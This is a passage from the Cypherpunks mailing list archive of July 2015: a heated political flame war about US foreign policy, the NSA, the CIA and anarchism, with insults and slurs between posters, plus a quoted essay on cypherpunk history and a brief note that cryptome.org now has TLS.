<55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> Message-ID: <55AED624.4090208@lig.net> This is farcical, but one more round lest silence be taken as tacit agreement. For those of you who can't efficiently process unwanted email, apologies. And consider getting a better email client + plugins. On 7/21/15 2:03 AM, Zenaan Harkness wrote: > On 7/21/15, Stephen D. Williams wrote: >> On 7/20/15 10:32 PM, Juan wrote: >>> On Mon, 20 Jul 2015 21:36:57 -0700 >>> "Stephen D. Williams" wrote: >>> >>>> On 7/20/15 9:07 PM, Juan wrote: >>>>> Hey. *Now* I get it. >>>>> >>>>> This mailing list has a lot of tor-tards who are apologists >>>>> of the pentagon's propaganda and spying efforts. >>>> Are you saying that the Pentagon is never good or useful? Nor are >>>> any of their spying efforts? >>> Are you saying the pentagon is good and useful? >> The Pentagon et al are protecting a large portion of the world from being >> overrun. Nobody else will do it. > Damn! From Russia and China yeah? Wow. What a mindset. Not really, more from warlords, dictators, etc. Supposedly Russia is "only protecting their ethnic Russians". From what? Joining NATO and Western Europe as far as I could tell. > https://en.wikipedia.org/wiki/Covert_United_States_foreign_regime_change_actions > > "The United States has been involved in and assisted in the overthrow > of foreign governments (more recently termed "regime change") without > the overt use of U.S. military force. Often, such operations are > tasked to the Central Intelligence Agency (CIA)." Yep, the US has been involved in all kinds of past situations, along with a number of other countries. Those were indeed the bad old days. Sometimes intentions were good, sometimes maybe not. It's too bad that people 40-80 years ago didn't have 2015 sensibilities. Romans begat Europe, British begat a lot, including terrible treatment of Aborigines and Maori. Europe decimated American Indians. Slavery. But you imply that past possibly-poor actions indicate present value. Hardly. None of those people are in power and most are dead. Everyone has learned a lot, J. Edgar Hoover is no longer blackmailing US Presidents and everyone else to preserve his FBI empire, etc. Americans beat up on America quite a bit and all of this eventually comes out, often these days as very watchable movies that authoritatively teach what we weren't taught in school, about the US and often the rest of the world. Generally, lessons are learned and we do better in the future. But occasionally someone slips in who is not an intellectual powerhouse and mistakes are made again. Se la vie. What's your better alternative? Even when the US meddled, except for a very few circumstances, it was to achieve something useful, not to subjugate peoples for colonies, incorporation into an empire, etc. The US pays a lot for legacy military bases everywhere, provides lots of protection and other benefits, and generally attempts fit in and be respectful. > > I grant they seem to be doing ... something. Here's the table of > contents from that wiki page: > > Contents > 1 Cold War > 1.1 Syria 1949 > ... 2.3 Iran 2005–present > > Perhaps those are the countries that were going to overrun "us" (never > mind the fact I live in Australia anyway, but damn, what a way of > thinking). What is your concept? That no one have power to repel anyone else? That some other country / culture is better suited to being "on top"? The US is the worst system, except for everything else. It is deliberately designed to be messy, in conflict, and unstable. The genius of this arrangement is that it leads to a stronger result than anything else. > SDW, thank you for being so frank - honest about how you think. It is > educational to me in a good way. Part of the difference is perhaps > that I am not living in the USA, so I look inwards to your government > and agencies, not outwards. Many non-Americans don't really get America, even if they have visited or lived here. Many Americans don't fully get America either; easy to be parochial. Not long ago, someone was tearing into the US about teargas being used in some situation, how terrible and dangerous it was, etc. I pointed out, with references, that every single American military individual is subjected to a good dose of teargas as part of training. >>>> when they don't determine their goals or rules of >>>> engagement? Their job is to be a bad ass tool, the proverbial big >>>> stick. It is someone else's job to decide how to use that tool. >>>> Marines don't kill people, politicians using Marines kill people. >>>> Err, something like that. >>> Marines and other 'military personnel' murder people when >>> 'ordered' to. They are the worst scumbags on earth. >>> >>> Politicians are morally responsible. The military are morally >>> and materially responsible. >> Are police always bad too? >> >>> ... >>> Is everyone from the CIA scumbags by definition? >>> Yes. >> Whatever you gotta believe. >> Most of their job is to understand the world, > :) > > Interesting way of "understanding" the world - 'regime change' is > about as polite a way the current empire can couch its predominant > activity since WWII. In some cases, regime change can be nice. Depends on specifics. ... >>>> I would even say that a lot of government employees and >>>> contractors seem to have got away with a lot of things they shouldn't >>>> have. But that doesn't mean that any of those organizations are >>>> fundamentally evil and aren't almost completely staffed by >>>> intelligent, respectable people. >>> >>> LOL. So, how much trolling should I let you get away with? >>> >>> Worthless murdering scumbags are 'respectable' people and not >>> 'fundamentally evil'. Sure. Maybe they are 'accidentally' >>> evil? >> DOJ, Treasury, State, HHS, etc. are filled with worthless murdering >> scumbags? > Time to wake up. You evidently need to do more research. The balance > of good vs. evil, of the once mighty USA, is well and truly tipped in > favour of despotism and cronyism at this point in history. Very > unfortunately. And notwithstanding the good remnant who do remain > actually within the system (as insignificant and ineffective as they > are to effecting good into the world). Yea? Interesting. I think you've been watching Fox News too much. Or you are talking about New Jersey. ;-) We obsess about that stuff precisely because it isn't tolerated at all, except for narrowly acceptable, mostly noise levels. How do you come to think this? What's your evidence? > > Greece. Rome. Persia. British Empire. USA. > > Every empire falls. USA has fallen, it just can't quite see the > reality of this yet. Yea? What would constitute a fall for the US? I don't think you understand the nature of the US or what would constitute a win. >> There are certain people, Marines et al, who are trained to be very lethal. >> Sucks to need that, but being anything less than the >> strongest & baddest isn't an option for the US. They are concentrated, >> supposed to be carefully deployed and directed. Create >> people like that from the subset of people who want to be like that and a >> few are going to go off the rails occasionally. That's a >> bummer, and needs to be constantly protected against, but there's no obvious >> alternative. >> >> The US is the least imperialist top superpower that ever existed. Still not >> perfect, but better than all the rest. > "No better than all the rest". Fixed that for you. Few would agree with that. > > The record is abysmal. USA is "morally" (on an international political > and death-toll level) and financially bankrupt. Depends on what you look at. There are some things that we as a group definitely think were mistakes, Iraq etc. > I just pray that the end of USA's grab for global hegemony means a > long lasting multi-polar world, and not a new imperialist Chinese > "empire regime". What do you think the "success" of a USA grab for global hegemony would look like? What do you think the USA end goal is if it wasn't "stopped"? >>> How about they 'accidentally' beat you to a pulp and then feed >>> you to the pigs? Just as an innocent mistake of course... >> Oh kay. Are you off your meds? > You're missing the point. "Regime change" means if you're in their > way, your life ends. Time for you to do some history lessons. Because > you feel safe (you're one of the "good guys" right?), you don't see > the problem, and you therefore have difficulty hearing the message. Your construction there seems off, but: Much of aggression has been about answering threats, directly or indirectly. So your statement doesn't apply to Afghanistan, WWII, etc. Korea, Vietnam, etc. were about a perceived threat that seemed real; we generally consider those to probably have been wrong on multiple levels. I guess you think that if anyone supports the US, they must be agreeing with everything that's ever happened. Obviously that's a terribly simplistic assumption. > > >>>> Anyway, if you're still in the rebelling against authority stage, >>>> fine, have fun. Good luck with that. In the US, government wise, >>>> the people are the authority >>> Really? That's an interesting concept. How many lsd doses do >>> you need in order to reach the parallel universe where that >>> is reality? Because in this universe, it isn't. >> You haven't been watching long or closely enough. Things have changed >> a lot in the US in my lifetime, and it's only speeding up. > Sadly, individual liberty was not respected enough to capture the > sanction of foreign thinkers. I'm being extraordinarily conservative > in my words here... "Capture the sanction of foreign thinkers"? Nonsense. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 14057 bytes Desc: not available URL: From juan.g71 at gmail.com Tue Jul 21 12:35:24 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 16:35:24 -0300 Subject: an ominous comment In-Reply-To: <20150721135311.GA9266@android> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <20150721135311.GA9266@android> Message-ID: <55ae9eae.421c8c0a.8618e.ffffa112@mx.google.com> On Tue, 21 Jul 2015 09:53:11 -0400 Nick Econopouly wrote: > It's amusing how Juan picked up the "apologist" term from my emails > and is now using it incorrectly. > https://cpunks.org/pipermail/cypherpunks/2014-December/006241.html "To the people who say that governments are not 'monolithic', something that entry-level tor apologists and the like mindlessly parrot. " I'm sorry Nick if I stole your word and infringed upon your intellectual property rights. I profusely apology. Please don't tell the FBI. Except...do you mind providing proof of your previous ownership of the term? Since I 'picked' it from you (you say), you surely can link messages previous to december 2014 in which you used it, right? I'll be waiting. J. > -nick From juan.g71 at gmail.com Tue Jul 21 13:06:02 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 17:06:02 -0300 Subject: an ominous comment In-Reply-To: <20150721135311.GA9266@android> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <20150721135311.GA9266@android> Message-ID: <55aea5dc.cc918c0a.1571.ffffb160@mx.google.com> On Tue, 21 Jul 2015 09:53:11 -0400 Nick Econopouly wrote: > The US government does not keep its power over its citizens with > just brute force and propaganda. It is a complex social relationship, > and yes a great deal of propaganda is involved. But it is not > totalitarian the way you frame it. Sure. It's not totalitarian. It's simply based on the free principle of democracy : obey or die. You don't need to waste your amazing intellect refuting me, Nick. I've conceded your point. > It is not like a children's movie > where the villians are all ugly and you can tell they are villians > just from the way they look and talk. The policeman, the marine dude, > and even the politician or CIA official came from some family and > applied for the job because it was considered an acceptable way to > make a living and contribute to society. They are not all evil. It > doesn't matter if the nasty recipe of them all mixed together makes > the USA cause/commit atrocities, it's simplistic and basically false > to act like every one of these USians is evil. Thanks Nick. Now I really get it. People who do evil things are not evil. They are good. 1) > Think of the disgruntled senator or NSA worker who is reading this > list, 2) > Actually, to be honest, you are serving the NSA more than anyone on > this list, even the "spies". 3) > Also, you guys really think there is an NSA-man personally > reading this list, looking for dissedents? Why would they waste their > time on this shit? See Nick, that's the real extent of your intellect. It took you two paragraphs to flatly contradict yourself. > The only ones subverting it are the most hardcore > cypherpunks here, Well, thanks for considering me a hardore cypherpunk? Now think about what you wrote. You're whining about cypherpunks in a cypherpunk mailing list. Do you see just how ridiculous you are? But I get it. What you want is a cypherpunk mailing list full of obama supporters - like you. Did I get that one right? > who act like pretty much every free cryptography > program is US propaganda somehow. If juan is an agent, he is doing his > job very well. Thanks. > > Many people in the govt. think they are doing good, and to be honest a > good deal of them are. Humor me. What word do you use to describe your political beliefs? > This coming from someone who thinks healthy > society could exist without a government. Oh OK. You are a fucking nutcase who fancies himself an anarchist while he praises the US government. I rest my case. > > Citizens think the government is on their side too, and it's not that > they are simply brainwashed. There are no mandatory telivision hours > where you have to watch govt propaganda, the two main sources of it > are in the msm (TV), and at school while the child grows up. It isn't > north korea, or 1984.The citizens > don't feel forced, most of them, and it's because the government has > this habit of NOT being an evil, creepy death cult most of the time. > The bad stuff happens away from the public view including the stuff > y'all have mentioned like the CIA mercenary armies and fiddling with > regimes after WWII. > > > > It has apologists of the US marines. > > > > It has high ranking scumbags from the CIA. > > > > It has commie 'anarchists' who are offended by (and would > > love to silence) people who badmouth the marines' apologists. > False. I wouldn't have interjected because then I am contributing to > the problems of this mailing list, but don't keep telling > fabrications about me please. > > Literally every statement in that sentance is a lie about me. Not > cool. > > > > And NOW it also has a google and cloud apologist. Welcome > > Stephen =) You are yet another reason to distrust the FLOSS > > movement and its bloatware. > > It's amusing how Juan picked up the "apologist" term from my emails > and is now using it incorrectly. > > -nick From coderman at gmail.com Tue Jul 21 19:01:29 2015 From: coderman at gmail.com (coderman) Date: Tue, 21 Jul 2015 19:01:29 -0700 Subject: an ominous comment In-Reply-To: <55aede6a.4e1b370a.e422f.ffffcd5f@mx.google.com> References: <55aede6a.4e1b370a.e422f.ffffcd5f@mx.google.com> Message-ID: On 7/21/15, Juan wrote: > ... > Thanks coderman. I was slightly annoyed thinking I might have > to search the archives to back my claim but you've fully > embarrassed yourself (yet again). Appreciated. you should see me in person! my email game is just warm up... you'll need to search the SELinux lists btw, not this one :) > Of course. If I were murdering people left and right, or > commiting any of the endless list of crimes your government > commits, they you'd be quite sure that I have GOOD intentions. actually i was thinking of code you've written for common good, but really, any evidence would be useful. until then, the jury's out... some of these discourses are thought provoking, others dumb provoking, and yet more are just TL;DR. ;) > But, since I'm not buying any of your stupid propaganda, you're > not sure if I'm an outright terrist...or somebody sitting at a > desk near you, right? someone i admire is a FOIA terrorist. good friends are "privacy extremists", and some shady fucks have sat next to me in the past. i'm not sure what to do with this metric you're using... > Ah yes. You are right. The real problem with the NSA and the US > gov't in general is that 'now' they allegedly started spying on > AMERICUNTS! no, my point about domestic surveillance is that any shred of restraint they may have had, is now evaporated. bulk spying is always bad, but done domestic you've gone rogue! so Juan, how to fix? From coderman at gmail.com Tue Jul 21 19:13:30 2015 From: coderman at gmail.com (coderman) Date: Tue, 21 Jul 2015 19:13:30 -0700 Subject: an ominous comment In-Reply-To: <20150722014050.GA11545@android> References: <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <20150721135311.GA9266@android> <55aea5dc.cc918c0a.1571.ffffb160@mx.google.com> <20150722014050.GA11545@android> Message-ID: On 7/21/15, Nick Econopouly wrote: > ... > I guess it's too much for someone to openly say they aren't 100% sure > how to solve the worlds problems or if we can, and doesn't want to > affiliate with any specific "ism" prison. this is why making better earth humans is always a win, and avoiding tribal behavior like politics and religion useful. i don't know how to fix the world's problems. i do know we need to better educate everyone. i do know we need to stop thinking in Me vs. You. thanks for adding to the signal, Nick! best regards, From coderman at gmail.com Tue Jul 21 20:28:55 2015 From: coderman at gmail.com (coderman) Date: Tue, 21 Jul 2015 20:28:55 -0700 Subject: Welcome to the future JYA! cryptome TLS enabled... Message-ID: https://cryptome.org/ is even EV special! :P also gets decent B grade on https://www.ssllabs.com/ssltest/analyze.html?d=cryptome.org&latest [ expected for a hosting provider, but always good to check... ] best regards, From list at sysfu.com Tue Jul 21 20:49:31 2015 From: list at sysfu.com (Seth) Date: Tue, 21 Jul 2015 20:49:31 -0700 Subject: an ominous comment In-Reply-To: <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> Message-ID: On Tue, 21 Jul 2015 13:54:25 -0700, Lance Cottrell wrote: > I recall it being more nuanced and diverse. I wasn't there in the beginning so I don't have any firsthand knowledge. According to this piece, [1] "Almost all cypherpunks were anarchists who regarded the state as the enemy." I'm basing the claim on the fact that founding member Timothy May wasn't exactly shy about his crypto *anarchy* vision of the future. Not sure what exactly what Eric Hughes or John Gilmore's were at the time. [1] http://onlyinamericablogging.blogspot.jp/2011/03/robert-manne-julian-assange-cypherpunk.html The cypherpunks emerged from a meeting of minds in late 1992 in the Bay Area of San Francisco. Its founders were Eric Hughes, a brilliant Berkeley mathematician; Timothy C. May, an already wealthy, former chief scientist at Intel who had retired at the age of thirty-four; and John Gilmore, another already retired and wealthy computer scientist – once number five at Sun Microsystems – who had co-founded an organisation to advance the cause of cyberspace freedom, the Electronic Frontier Foundation. They created a small group, which met monthly in Gilmore’s office at a business he had created, Cygnus. At one of the early meetings of the group, an editor at Mondo 2000, Jude Milhon, jokingly called them cypherpunks, a play on cyberpunk, the “hi-tech, low-life” science-fiction genre. The name stuck. It soon referred to a vibrant emailing list, created shortly after the first meeting, which had grown to 700 by 1994 and perhaps 2000 by 1997 with by then up to a hundred postings per day. It also referred to a distinctive sub-culture – eventually there were cypherpunk novels, Snowcrash, Cryptonomicon, Indecent Communications; a cypherpunk porno film, Cryptic Seduction; and even a distinctive cypherpunk dress: broad-brimmed black hats. Most importantly, however, it referred to a political–ideological crusade. At the core of the cypherpunk philosophy was the belief that the great question of politics in the age of the internet was whether the state would strangle individual freedom and privacy through its capacity for electronic surveillance or whether autonomous individuals would eventually undermine and even destroy the state through their deployment of electronic weapons newly at hand. Many cypherpunks were optimistic that in the battle for the future of humankind – between the State and the Individual – the individual would ultimately triumph. Their optimism was based on developments in intellectual history and computer software: the invention in the mid-1970s of public-key cryptography by Whitfield Diffie and Martin Hellman, and the creation by Phil Zimmerman in the early 1990s of a program known as PGP, “Pretty Good Privacy”. The seminal historian of codes, David Kahn, argued that the Diffie–Hellman invention represented the most important development in cryptography since the Renaissance. Zimmerman’s PGP program democratised their invention and provided individuals, free of cost, with access to public-key cryptography and thus the capacity to communicate with others in near-perfect privacy. Although George Orwell’s Nineteen Eighty-Four was one of the cypherpunks’ foundational texts, because of the combination of public-key cryptography and PGP software, they tended to believe that in the coming battle between Big Brother and Winston Smith, the victor might be Winston Smith. At the time the cypherpunks formed, the American government strongly opposed the free circulation of public-key cryptography. It feared that making it available would strengthen the hands of the espionage agencies of America’s enemies abroad and of terrorists, organised criminals, drug dealers and pornographers at home. For the cypherpunks, the question of whether cryptography would be freely available would determine the outcome of the great battle of the age. Their most important practical task was to write software that would expand the opportunities for anonymous communication made possible by public-key cryptography. One of the key projects of the cypherpunks was “remailers”, software systems that made it impossible for governments to trace the passage from sender to receiver of encrypted email traffic. Another key project was “digital cash”, a means of disguising financial transactions from the state. Almost all cypherpunks were anarchists who regarded the state as the enemy. Most but not all were anarchists of the Right, or in American parlance, libertarians, who supported laissez-faire capitalism. The most authoritative political voice among the majority libertarian cypherpunks was Tim May, who, in 1994, composed a vast, truly remarkable document, “Cyphernomicon”. May called his system crypto-anarchy. He regarded crypto-anarchy as the most original contribution to political ideology of contemporary times. May thought the state to be the source of evil in history. He envisaged the future as an Ayn Rand utopia of autonomous individuals dealing with each other as they pleased. Before this future arrived, he advocated tax avoidance, insider trading, money laundering, markets for information of all kinds, including military secrets, and what he called assassination markets not only for those who broke contracts or committed serious crime but also for state officials and the politicians he called “Congressrodents”. He recognised that in his future world only elites with control over technology would prosper. No doubt “the clueless 95%” – whom he described as “inner city breeders” and as “the unproductive, the halt and the lame” – “would suffer, but that is only just”. May acknowledged that many cypherpunks would regard these ideas as extreme. He also acknowledged that, while the overwhelming majority of cypherpunks were, like him, anarcho-capitalist libertarians, some were strait-laced Republicans, left-leaning liberals, Wobblies or even Maoists. Neither fact concerned him. The cypherpunks formed a house of many rooms. The only thing they all shared was an understanding of the political significance of cryptography and the willingness to fight for privacy and unfettered freedom in cyberspace. From list at sysfu.com Tue Jul 21 20:59:21 2015 From: list at sysfu.com (Seth) Date: Tue, 21 Jul 2015 20:59:21 -0700 Subject: Welcome to the future JYA! cryptome TLS enabled... In-Reply-To: References: Message-ID: On Tue, 21 Jul 2015 20:28:55 -0700, coderman wrote: > https://cryptome.org/ > > is even EV special! Holy Schnikes, this must mean the rapture is around the corner. Any insight into the change of heart? Judging by JYAs past tirades against crypto, it looked like you were going to have to pull the HTTP protocol out of his cold dead fingers. From juan.g71 at gmail.com Tue Jul 21 17:05:08 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 21:05:08 -0300 Subject: an ominous comment In-Reply-To: <55AED624.4090208@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AED624.4090208@lig.net> Message-ID: <55aedde9.4c35370a.72c5.ffffca1c@mx.google.com> On Tue, 21 Jul 2015 16:30:44 -0700 "Stephen D. Williams" wrote: > This is farcical, Right Stephen. That's the only thing you got right. You and others are your own unintentional parody. From juan.g71 at gmail.com Tue Jul 21 17:07:17 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 21:07:17 -0300 Subject: an ominous comment In-Reply-To: References: Message-ID: <55aede6a.4e1b370a.e422f.ffffcd5f@mx.google.com> On Tue, 21 Jul 2015 15:22:58 -0700 coderman wrote: > On 7/20/15, Stephen D. Williams wrote: > >> > >> It has people who say that the NSA does good things > >> (coderman) > > > > They don't? > > defensive mission vs. offensive like the duality of existence, > good and bad, bad and good; polemic extremes always. Thanks coderman. I was slightly annoyed thinking I might have to search the archives to back my claim but you've fully embarrassed yourself (yet again). Appreciated. > > gotta learn offensive to know how to defend. then defender uses to > advance attacks? > > we're fighting this front in many contexts. all the easy lines are > drawn, and the problems left hard to impossible. > > --- > > i don't know if you have good or bad intentions, Juan. Of course. If I were murdering people left and right, or commiting any of the endless list of crimes your government commits, they you'd be quite sure that I have GOOD intentions. But, since I'm not buying any of your stupid propaganda, you're not sure if I'm an outright terrist...or somebody sitting at a desk near you, right? > > but i hope you know what i like about NSA is their defensive support, > and i miss the days when they weren't raving drunk with offensive > addiction pointed domestically... Ah yes. You are right. The real problem with the NSA and the US gov't in general is that 'now' they allegedly started spying on AMERICUNTS! How did jesus allow such monstrosity to happen? I mean, burn brown people abroad? Of course. Fun and profit! But spy on white anglo saxon AMERICANS??? How did fucking g-d let that happen. We all pray for the NSA to go back to its defensive anti-terrist activities. > > [ and funny enough, their offensive addiction led to leaks which led > to mass adoption of crypto in ways i never imagined could happen. so > might even say a BAD NSA is good for privacy. ] Sure. Google and the cloud now are password protected. Nice. > > --- > > best regards and intentions, > even to Juan ;P From nickeconopouly at gmail.com Tue Jul 21 18:40:51 2015 From: nickeconopouly at gmail.com (Nick Econopouly) Date: Tue, 21 Jul 2015 21:40:51 -0400 Subject: an ominous comment In-Reply-To: <55aea5dc.cc918c0a.1571.ffffb160@mx.google.com> References: <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <20150721135311.GA9266@android> <55aea5dc.cc918c0a.1571.ffffb160@mx.google.com> Message-ID: <20150722014050.GA11545@android> On 07/21, Juan wrote: > On Tue, 21 Jul 2015 09:53:11 -0400 > Nick Econopouly wrote: > > > > The US government does not keep its power over its citizens with > > just brute force and propaganda. It is a complex social relationship, > > and yes a great deal of propaganda is involved. But it is not > > totalitarian the way you frame it. > > > Sure. It's not totalitarian. It's simply based on the free > principle of democracy : obey or die. ok > > You don't need to waste your amazing intellect refuting me, > Nick. I've conceded your point. nah you basically can't understand my emails but ok > > > > > It is not like a children's movie > > where the villians are all ugly and you can tell they are villians > > just from the way they look and talk. The policeman, the marine dude, > > and even the politician or CIA official came from some family and > > applied for the job because it was considered an acceptable way to > > make a living and contribute to society. They are not all evil. It > > doesn't matter if the nasty recipe of them all mixed together makes > > the USA cause/commit atrocities, it's simplistic and basically false > > to act like every one of these USians is evil. > > > Thanks Nick. Now I really get it. People who do evil things are > not evil. They are good. You don't get it, at all. Interestingly enough, a lot of anarchist theory agrees with what I said- The idea that people are like blank slates and not good or evil. It says that people are influenced by the world around them and that is what determines their morality, etc. So, for instance, while most people today could not accept or live in an anarchist society(without some... un-indoctrination at the very least), people who are raised in one would find it perfectly normal and agreeable. > > > 1) > > Think of the disgruntled senator or NSA worker who is reading this > > list, As in someone reading it in their free time, not because they were assigned to spook it. Obviously. > > 2) > > Actually, to be honest, you are serving the NSA more than anyone on > > this list, even the "spies". Unintentionaly. Indirectly. Whatever. I guess adding a few implied words makes reading comprehension easier for some people. I was not making a statement about your affiliation. > > 3) > > Also, you guys really think there is an NSA-man personally > > reading this list, looking for dissedents? Why would they waste their > > time on this shit? > > > > See Nick, that's the real extent of your intellect. It took you > two paragraphs to flatly contradict yourself. No, it took you two paragraphs to show that you can't understand my basic points. > > > > > The only ones subverting it are the most hardcore > > cypherpunks here, > > Well, thanks for considering me a hardore cypherpunk? Now think > about what you wrote. You're whining about cypherpunks in a > cypherpunk mailing list. Do you see just how ridiculous you > are? I should have put quotes around "cypherpunks". I think it's laughable for cypherpunks to basically not support some of the most important cryptography around. You are hardcore because of your trolling, and cypherpunk because you are on this list. > > But I get it. What you want is a cypherpunk mailing list full of > obama supporters - like you. Did I get that one right? I guess it's too much for someone to openly say they aren't 100% sure how to solve the worlds problems or if we can, and doesn't want to affiliate with any specific "ism" prison. > > > > > > who act like pretty much every free cryptography > > program is US propaganda somehow. If juan is an agent, he is doing his > > job very well. > > Thanks. > > > > > > > Many people in the govt. think they are doing good, and to be honest a > > good deal of them are. > > > Humor me. What word do you use to describe your political > beliefs? The problem is one word could never do justice to a diverse, changing view of the world. I tend not to have "political" beliefs anyway, unless you count staying away from politics. My friend is a volunteer firefighter, and most of the firefighters in USA are volunteers. They have a town logo on them, but they are not evil. > > > > > This coming from someone who thinks healthy > > society could exist without a government. > > > Oh OK. You are a fucking nutcase who fancies himself an > anarchist while he praises the US government. again, none of these things are true. My main point was black/white arguments against the government are unrealistic and childish, and can't hope to convince people that it is reasonable to question their society. I was hardly praising anything. What I said about people thinking they are doing good still stands. Ask any police officer, they will think that they are protecting and serving the public. Whether or not that is the actual role of their position. When anti-authoritarians (or anarchists, or whatever people here are) come off as haters of the meany evil poo-poo US government and all of its villians, who will take them/us seriously? > > > I rest my case. > > > > > > > > Citizens think the government is on their side too, and it's not that > > they are simply brainwashed. There are no mandatory telivision hours > > where you have to watch govt propaganda, the two main sources of it > > are in the msm (TV), and at school while the child grows up. It isn't > > north korea, or 1984.The citizens > > don't feel forced, most of them, and it's because the government has > > this habit of NOT being an evil, creepy death cult most of the time. > > The bad stuff happens away from the public view including the stuff > > y'all have mentioned like the CIA mercenary armies and fiddling with > > regimes after WWII. > > > > > > It has apologists of the US marines. > > > > > > It has high ranking scumbags from the CIA. > > > > > > It has commie 'anarchists' who are offended by (and would > > > love to silence) people who badmouth the marines' apologists. > > False. I wouldn't have interjected because then I am contributing to > > the problems of this mailing list, but don't keep telling > > fabrications about me please. > > > > Literally every statement in that sentance is a lie about me. Not > > cool. > > > > > > And NOW it also has a google and cloud apologist. Welcome > > > Stephen =) You are yet another reason to distrust the FLOSS > > > movement and its bloatware. > > > > It's amusing how Juan picked up the "apologist" term from my emails > > and is now using it incorrectly. > > > > -nick > From juan.g71 at gmail.com Tue Jul 21 19:25:53 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 23:25:53 -0300 Subject: an ominous comment In-Reply-To: References: <55aede6a.4e1b370a.e422f.ffffcd5f@mx.google.com> Message-ID: <55aefee6.540f370a.4a711.ffffd806@mx.google.com> On Tue, 21 Jul 2015 19:01:29 -0700 coderman wrote: > On 7/21/15, Juan wrote: > > > > Of course. If I were murdering people left and right, or > > commiting any of the endless list of crimes your government > > commits, they you'd be quite sure that I have GOOD > > intentions. > > actually i was thinking of code you've written for common good, LMAO. You make up your bullshit as you go eh? What code did you write? Let me know so that I can avoid it. > > > > Ah yes. You are right. The real problem with the NSA and > > the US gov't in general is that 'now' they allegedly started > > spying on AMERICUNTS! > > no, my point about domestic surveillance is that any shred of > restraint they may have had, is now evaporated. bulk spying is always > bad, but done domestic you've gone rogue! > > so Juan, how to fix? Ask your cypherpunk buddies. Or the tor cunts! Or the NSA. I'm told they do good things. And have the best of intentions. From juan.g71 at gmail.com Tue Jul 21 19:58:58 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 23:58:58 -0300 Subject: an ominous comment In-Reply-To: <20150722014050.GA11545@android> References: <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <20150721135311.GA9266@android> <55aea5dc.cc918c0a.1571.ffffb160@mx.google.com> <20150722014050.GA11545@android> Message-ID: <55af06a8.421c8c0a.f03b5.0155@mx.google.com> On Tue, 21 Jul 2015 21:40:51 -0400 Nick Econopouly wrote: > Interestingly enough, a lot of anarchist theory agrees with what I > said- The idea that people are like blank slates and not good or > evil. No, that's not what the 'blank slate' metaphor is about. 'blank slate' is a name for the view or doctrine that the 'mind' doesn't have any kind of innate knowledge and that everything comes from experience. In the moral realm it would mean that people don't have INBORN ideas of good and evil BUT that doesn't mean that the concepts are meaningless. Only that they are acquired later in life as the mind develops. On the other hand, the people who don't regard actions as good or evil are amoralist psychos. Nothing to do with anarchism. > It says that people are influenced by the world around them and > that is what determines their morality, etc. Sure. 'anarchism' is amoralism. Slavery? Just a historical custom. War? An innocent mistake. Well not a mistake since truth and error are also 'social constructs' - or something like that. > > I was hardly praising anything. What I said about people thinking they > are doing good still stands. Ask any police officer, they will think > that they are protecting and serving the public. 1) that is false. While a 'majority' of your beloved psychos may say that, not necessarily all do. Actually I wouldn't be surprised if the majority admitted **off the record** that they are scumbags who love to boss people around and even get paid for it. 2) even if the majority of cops *said* that they regard 